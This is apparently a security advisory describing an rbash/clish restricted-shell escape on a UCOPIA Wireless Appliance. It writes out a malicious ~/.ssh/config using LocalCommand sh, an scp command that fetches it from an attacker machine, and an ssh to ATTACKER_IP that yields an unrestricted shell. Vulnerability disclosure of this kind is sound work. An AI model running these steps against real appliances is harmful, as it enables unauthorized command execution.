Administrators can connect to their UCOPIA Wireless Appliance using the SSH (TCP/22) or Web SSH (TCP/222) interfaces. The system shell is restricted through the usage of rbash and clish: specific commands or flags are disallowed on purpose, therefore a malicious administrator might want to escape from this shell in order to execute arbitrary commands.
The vulnerability lies in the handling of the ~/.ssh/config file on the UCOPIA system: OpenSSH reads this file when connecting to other machines through SSH. However, a malicious administrator could abuse the LocalCommand instruction to start a sh shell locally after establishing the connection, and therefore obtaining an unrestricted shell.
Login as admin (SSH / Web SSH): you obtain a restricted shell (the prompt is “>”).
Then, use scp (or any other available technique) on the appliance to retrieve a malicious .ssh/config file from the attacker machine. The malicious ~/.ssh/config file must contain this content:
Host * PermitLocalCommand yes LocalCommand sh User root
- PermitLocalCommand allows the usage of the LocalCommand instruction. We can do this since it is not unauthorized by the global SSH configuration.
- LocalCommand is the command to run after establishing the SSH connection. Here we want an unrestricted shell, so we choose “sh”.
We prepare the malicious .ssh/config on attacker’s side and store it in /tmp/config.
We download the file from the attacker’s machine (172.16.17.43) on the appliance and save it in ~/.ssh/config:
> scp root@IP_attaquant:/tmp/config .ssh/config
We confirm that the file is present and we connect again to the attacker’s machine (172.16.17.43), this time with ssh. We can see that we obtain an unrestricted shell (see the normal « $ » prompt) after establishing the connection.
> ssh ATTACKER_IP $ # unrestricted shell
We are in a chroot sandbox, therefore many classic commands are missing.